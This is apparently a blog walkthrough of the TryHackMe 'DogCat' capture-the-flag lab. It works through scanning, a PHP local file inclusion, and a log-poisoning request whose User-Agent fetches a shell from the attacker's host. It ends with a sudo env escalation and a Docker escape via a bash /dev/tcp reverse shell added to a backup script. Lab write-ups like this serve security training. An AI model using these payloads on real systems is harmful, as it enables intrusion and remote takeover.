TryHackMe - DogCat | Shubham Kumar

Initial Scan

nmap

1	nmap -sC -sV -oN nmap/dogcat 10.10.208.6

Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-09 10:21 EDT
Nmap scan report for 10.10.208.6
Host is up (0.19s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 24:31:19:2a:b1:97:1a:04:4e:2c:36:ac:84:0a:75:87 (RSA)
|   256 21:3d:46:18:93:aa:f9:e7:c9:b5:4c:0f:16:0b:71:e1 (ECDSA)
|_  256 c1:fb:7d:73:2b:57:4a:8b:dc:d7:6f:49:bb:3b:d0:20 (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: dogcat
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 49.14 seconds

Web Server

1	http://10.10.208.6/?view=dog

view=dog and view=cat shows dog and cat pics respectively so trying LFI on that

1	http://10.10.208.6/?view=./dog/../../../../etc/passwd

which give us some error but confirm we have LFI

with php filter we can leak the index.php source code

1	http://10.10.208.6/?view=php://filter/read=convert.base64-encode/resource=./dog/../index

PCFET0NUWVBFIEhUTUw+CjxodG1sPgoKPGhlYWQ+CiAgICA8dGl0bGU+ZG9nY2F0PC90aXRsZT4KICAgIDxsaW5rIHJlbD0ic3R5bGVzaGVldCIgdHlwZT0idGV4dC9jc3MiIGhyZWY9Ii9zdHlsZS5jc3MiPgo8L2hlYWQ+Cgo8Ym9keT4KICAgIDxoMT5kb2djYXQ8L2gxPgogICAgPGk+YSBnYWxsZXJ5IG9mIHZhcmlvdXMgZG9ncyBvciBjYXRzPC9pPgoKICAgIDxkaXY+CiAgICAgICAgPGgyPldoYXQgd291bGQgeW91IGxpa2UgdG8gc2VlPzwvaDI+CiAgICAgICAgPGEgaHJlZj0iLz92aWV3PWRvZyI+PGJ1dHRvbiBpZD0iZG9nIj5BIGRvZzwvYnV0dG9uPjwvYT4gPGEgaHJlZj0iLz92aWV3PWNhdCI+PGJ1dHRvbiBpZD0iY2F0Ij5BIGNhdDwvYnV0dG9uPjwvYT48YnI+CiAgICAgICAgPD9waHAKICAgICAgICAgICAgZnVuY3Rpb24gY29udGFpbnNTdHIoJHN0ciwgJHN1YnN0cikgewogICAgICAgICAgICAgICAgcmV0dXJuIHN0cnBvcygkc3RyLCAkc3Vic3RyKSAhPT0gZmFsc2U7CiAgICAgICAgICAgIH0KCSAgICAkZXh0ID0gaXNzZXQoJF9HRVRbImV4dCJdKSA/ICRfR0VUWyJleHQiXSA6ICcucGhwJzsKICAgICAgICAgICAgaWYoaXNzZXQoJF9HRVRbJ3ZpZXcnXSkpIHsKICAgICAgICAgICAgICAgIGlmKGNvbnRhaW5zU3RyKCRfR0VUWyd2aWV3J10sICdkb2cnKSB8fCBjb250YWluc1N0cigkX0dFVFsndmlldyddLCAnY2F0JykpIHsKICAgICAgICAgICAgICAgICAgICBlY2hvICdIZXJlIHlvdSBnbyEnOwogICAgICAgICAgICAgICAgICAgIGluY2x1ZGUgJF9HRVRbJ3ZpZXcnXSAuICRleHQ7CiAgICAgICAgICAgICAgICB9IGVsc2UgewogICAgICAgICAgICAgICAgICAgIGVjaG8gJ1NvcnJ5LCBvbmx5IGRvZ3Mgb3IgY2F0cyBhcmUgYWxsb3dlZC4nOwogICAgICAgICAgICAgICAgfQogICAgICAgICAgICB9CiAgICAgICAgPz4KICAgIDwvZGl2Pgo8L2JvZHk+Cgo8L2h0bWw+Cg==

<!DOCTYPE HTML>
<html>

<head>
    <title>dogcat</title>
    <link rel="stylesheet" type="text/css" href="/style.css">
</head>

<body>
    <h1>dogcat</h1>
    <i>a gallery of various dogs or cats</i>

    <div>
        <h2>What would you like to see?</h2>
        <a href="/?view=dog"><button id="dog">A dog</button></a> <a href="/?view=cat"><button id="cat">A cat</button></a><br>
        <?php
            function containsStr($str, $substr) {
                return strpos($str, $substr) !== false;
            }
	    $ext = isset($_GET["ext"]) ? $_GET["ext"] : '.php';
            if(isset($_GET['view'])) {
                if(containsStr($_GET['view'], 'dog') || containsStr($_GET['view'], 'cat')) {
                    echo 'Here you go!';
                    include $_GET['view'] . $ext;
                } else {
                    echo 'Sorry, only dogs or cats are allowed.';
                }
            }
        ?>
    </div>
</body>

</html>

now we know why we needed dog or cat in the url.

Getting flag1

1	http://10.10.208.6/?view=php://filter/read=convert.base64-encode/resource=./dog/../flag

Note: This is a partial content

1	PD9waHAKJGZsYWdfMSA9ICJUSE17VGgxcwo=

decoded data

1 2	<?php $flag_1 = "THM{Th1s

RCE

GET /?view=./dog/../../../../../../../../../var/log/apache2/access.log&ext= HTTP/1.1
Host: 10.10.59.238
User-Agent: <?php file_put_contents('f3v3r.php',file_get_contents('http://10.X.X.X/shell.php')); ?>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

I was serving shell.php which was php-reverse-shell.php which i was serving on port 80 and a nc listener on 9001 to get a shell back

and opening

1	http://10.10.208.6/f3v3r.php

give us the shell

Flag2

$ whoami;hostname;cut -c 1-15 /var/www/flag2_QMW7JvaY2LvK.txt
www-data
9c79ecf0f992
THM{LF1_t0_RC3_
$

Privilege Escalation

sudo -l

Matching Defaults entries for www-data on 9c79ecf0f992:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on 9c79ecf0f992:
    (root) NOPASSWD: /usr/bin/env

so running

1	sudo env /bin/bash

give us a root shell but that is in the container

Flag 3

whoami;hostname;cut -c 1-5 flag3.txt
root
9c79ecf0f992
THM{D

Escaping the Docker

In /opt/backups folder we see a script so we modify that to give us a reverse shell.

cat backup.sh
#!/bin/bash
tar cf /root/container/backup/backup.tar /root/container
echo "#!/bin/bash" > backup.sh;echo "bash -i >& /dev/tcp/10.X.X.X/9002 0>&1" >> backup.sh

Flag 4

nc -nvlp 9002
root@dogcat:~# whoami;hostname;cut -c 1-15 flag4.txt
whoami;hostname;cut -c 1-15 flag4.txt
root
dogcat
THM{esc4l4tions
root@dogcat:~#

and we have pwnded Dogcat